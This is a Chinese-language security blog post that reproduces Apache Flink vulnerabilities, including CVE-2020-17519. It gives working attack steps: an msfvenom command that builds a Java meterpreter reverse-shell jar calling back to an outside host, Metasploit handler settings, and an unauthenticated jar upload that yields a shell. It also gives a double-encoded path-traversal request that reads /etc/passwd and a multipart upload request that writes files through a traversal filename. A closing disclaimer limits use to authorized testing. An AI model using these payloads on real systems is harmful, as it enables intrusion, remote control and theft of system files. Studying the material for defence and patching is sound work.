Apache Flink CVE-2020-17519复现及历史漏洞合集

Part 01

前言

近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞，影响范围：<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的，此次复现就是通过版本Version: 1.11.2进行复现利用。

蹭波热度，发一下已公开Apache Flink漏洞合集。

Part 02

任意jar包上传导致远程代码执行

搭建好靶场就省略了。

打开一个使用 Apache Flink 的网站，直接就未授权了

点击提交新工作

打开MSF 生成一个 jar 木马

msfvenom -p java/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f jar > test.jar

点击 Add 上传 jar 文件

监听端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

set lhost 1.1.1.1

set lport 4444

run

点击下 submit

反弹回来一个shell

Part 03

任意文件读取

Poc: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

直接根目录下访问就行了

Part 04

文件写入

Poc：

POST /jars/upload HTTP/1.1

Host: 1.1.1.1:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Wed, 06 Jan 2021 03:23:18 GMT

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 185

------WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success

------WebKitFormBoundaryoZ8meKnrrso89R6Y--

出现400没事，直接访问

http://1.1.1.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

Part 05

免责声明

本项目仅进行信息搜集，漏洞探测工作，无漏洞利用、攻击性行为，发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。请使用者遵守当地相关法律，勿用于非授权测试，勿用于非授权测试，勿用于非授权测试~~（重要的事情说三遍）~~，如作他用所承受的法律责任一概与凌晨安全无关！！！